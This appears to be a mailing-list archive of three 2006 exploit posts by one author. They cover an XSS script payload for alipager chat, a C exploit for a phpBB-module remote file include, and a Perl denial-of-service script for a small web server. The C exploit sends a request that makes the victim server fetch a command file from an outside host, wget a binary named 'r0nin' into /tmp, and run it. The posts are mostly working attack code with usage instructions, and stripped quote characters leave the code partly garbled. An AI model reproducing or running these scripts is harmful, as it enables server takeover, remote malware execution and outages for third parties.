alipager xss attack

2006-06-17 Thread s3rv3r_hack3r 
Vendor : www.roostercode.com

version : all version!

BUG :

You can include all html tag ... in chat line !

for example : scriptalert(HI users!)/script

+

Foing Remote File Include Vulnerability [PHPBB]

2006-05-29 Thread s3rv3r_hack3r 
vendor : phpbbhacks.com

Exploit BY :s3rv3r_hack3r

WWW : http://www.hackerz.ir

Exploit 


/* Foing Remote File Include exploit By s3rv3r_hack3r */


#include stdio.h

#include stdlib.h

#include string.h

#include unistd.h

#include sys/types.h

#include sys/socket.h

#include netinet/in.h

#include arpa/inet.h

#define PORT 80


char shellop[] = GET 
/index.php?phpbb_root_path=http://www.hackerz.ir/cmd.txt?cmd=cd 
../../../../../../../../../../tmp;wget http://www.hackerz.ir/r0nin;;

  chmod +X r0nin;./r0nin%60%22|\r;


int main(int argc, char *argv[]) {


char shell[BUFSIZ];

int sock;

struct sockaddr_in remop;


if(argc != 2) {

printf(\n\n);

printf(\n Iran Hackerz Security Team \n);

printf(\nWebSite's: www.hackerz.ir  www.h4ckerz.com \n);

printf(\n\n);

printf(\n*Foing Remote File Include Vulnerability [PHPBB]*   \n);

printf(\n\n);

printf(\nUsage: http://www.Victim.ltd/[foingpath]\n);

printf(\n\n);

return 0; }


if(argc == 2) {


printf(\n\n);

printf(\nExploit By : [EMAIL PROTECTED]\n);

printf(\nPLZ A W8\n);

printf(\n\n);



remop.sin_family = AF_INET;

remop.sin_port = htons(PORT);

remop.sin_addr.s_addr = inet_addr(argv[1]);


if((sock = socket(AF_INET, SOCK_STREAM, 0))  0) {

printf(\nERROR: Socket()\n\n);

return -1; }


if(connect(sock,(struct sockaddr *)remop, sizeof(struct sockaddr))  0) {

printf(\nERROR: Connect()\n\n);

return -1; }


if(send(sock,shellop, sizeof(shellop), 0)  0) {

printf(\nERROR: Send()\n\n);

return -1; }


close(sock);

sleep(3);


printf(\nr0nin run seccessfuly\n\n);


printf(\n); }


return 0; }

my Web Server v-1.0 Denial of Service Exploit

2006-05-26 Thread s3rv3r_hack3r 
#!/usr/bin/perl

#my Web Server  v-1.0 Denial of Service Exploit

#vendor : Eitsop.s5.com

use IO::Socket;

use strict;


my($socket) = ;

  

if($socket = IO::Socket::INET-new(

PeerAddr = $ARGV[0],

PeerPort = $ARGV[1],

Proto = TCP))

{

print ++\n;

print Connecting to $ARGV[0]:$ARGV[1] ...\n;

print ++\n;

print Exploit Send successfuly!!\n;

print ++\n;

print $socket GET 
/a
 HTTP/1.0\r\n\r\n;

close($socket);

}

else

{

print \n;

print   ___ _____ \n;

print  /   |   \_ |  | __ ___ \n;

print /~\__  \ _/ ___\|  |/ // __ \_  __ \___   / \n;

print \Y// __ \\  \___|\  ___/|  | \///  \n;

print  \___|_  /(  )\___  __|_ \\___  __|  /_ \ \n;

print\/  \/ \/ \/\/\/ \n;

print  Iran Hackerz Security Team \n;

print WebSite's: www.hackerz.ir  www.h4ckerz.com \n;

print \n;

print [Usage]perl myws.pl IP Port \n;

print \n;

print [Status]Can Not Connect To  $ARGV[0]:$ARGV[1] \n;

print \n;

}

#EoF